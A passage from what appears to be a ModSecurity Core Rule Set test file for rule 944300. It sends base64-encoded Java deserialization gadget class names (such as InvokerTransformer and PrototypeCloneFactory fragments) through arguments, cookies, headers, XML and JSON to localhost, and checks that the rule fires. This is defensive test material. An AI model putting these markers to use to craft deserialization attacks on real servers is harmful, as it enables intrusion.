BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-227 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BpbnZva2VydHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-228 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=BpbnZva2VydHJhbnNmb3JtZXI" output: log_contains: "id \"944300\"" - test_title: 944300-229 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" output: log_contains: "id \"944300\"" - test_title: 944300-230 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-231 desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-232 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" output: log_contains: "id \"944300\"" - test_title: 944300-233 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-234 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-235 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-236 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-237 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-238 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-239 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-240 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"cHJvdG90eXBlY2xvbmVmYWN0b3J5\"}" output: log_contains: "id \"944300\"" - test_title: 944300-241 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"cHJvdG90eXBlY2xvbmVmYWN0b3J5\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-242 desc: "Argument test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-243 desc: "Argument name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-244 desc: "Cookie test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-245 desc: "Cookie name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: HByb3RvdHlwZWNsb25lZmFjdG9yeQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-246 desc: "Request header test includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: HByb3RvdHlwZWNsb25lZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-247 desc: "XML attribute value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-248 desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-249 desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-250 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-251 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-252 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-253 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-254 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" output: log_contains: "id \"944300\"" - test_title: 944300-255 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-256 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-257 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-258 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-259 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-260 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-261 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-262 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" output: log_contains: "id \"944300\"" - test_title: 944300-263 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-264 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-265 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" output: log_contains: "id \"944300\"" - test_title: 944300-266 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-267 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-268 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-269 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-270 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: 